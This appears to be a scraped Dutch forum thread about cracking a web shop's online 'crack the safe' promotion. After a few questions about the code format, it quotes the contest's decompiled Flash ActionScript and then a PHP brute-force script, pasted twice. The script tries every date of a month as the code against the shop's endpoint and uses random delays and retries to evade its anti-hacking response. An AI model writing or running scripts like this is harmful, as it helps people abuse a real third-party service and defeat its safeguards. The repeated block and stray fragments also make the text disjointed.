Tijdsaanduiding is toch am of pm?
Maar je mag toch alleen cijfers gebruiken?
Maar je mag toch alleen cijfers gebruiken?
ontvang = new LoadVars();
zend = new LoadVars();
zend.code = iv.text;
zend.sendAndLoad("http://www.bax-shop.nl/components/com_kraakdekluis/kraakdekluis.php?act=code", ontvang, "POST");
ontvang.onLoad = function (success)
{
if (success)
{
loadMovie("http://www.bax-shop.nl/components/com_kraakdekluis/kraakdekluis.php?act=image&code=" + iv.text, "kluis");
iv.text = ontvang.flashWaarde;
dicht.visible = false;
}
}
;
}
;
<?php
include "class.chttp.php";
$cHTTP = new cHTTP();
$maand = 01;
$aantal = 0;
function haal($code){
global $cHTTP, $aantal;
$cHTTP->cHTTP('http://www.bax-shop.nl/components/com_kraakdekluis/kraakdekluis.php?act=code&code='.$code);
$ex = $cHTTP->exe();
if($ex != 'Hacken heeft geen zin ;-)')
{
return $aantal.' '.$ex;
}
else
{
sleep(RAND(0,20));
$aantal++;
if($aantal < 10)
{
return haal($code);
}
else
{
return $aantal.' Mislukt<br />';
}
}
}
for($i = 1; $i <= 31; $i++){
echo '2010'.$maand.($i < 10 ? '0'.$i : $i).' '.haal('2010'.$maand.($i < 10 ? '0'.$i : $i)).'<br />';
}
<?php
include "class.chttp.php";
$cHTTP = new cHTTP();
$maand = 01;
$aantal = 0;
function haal($code){
global $cHTTP, $aantal;
$cHTTP->cHTTP('http://www.bax-shop.nl/components/com_kraakdekluis/kraakdekluis.php?act=code&code='.$code);
$ex = $cHTTP->exe();
if($ex != 'Hacken heeft geen zin ;-)')
{
return $aantal.' '.$ex;
}
else
{
sleep(RAND(0,20));
$aantal++;
if($aantal < 10)
{
return haal($code);
}
else
{
return $aantal.' Mislukt<br />';
}
}
}
for($i = 1; $i <= 31; $i++){
echo '2010'.$maand.($i < 10 ? '0'.$i : $i).' '.haal('2010'.$maand.($i < 10 ? '0'.$i : $i)).'<br />';
}
Comment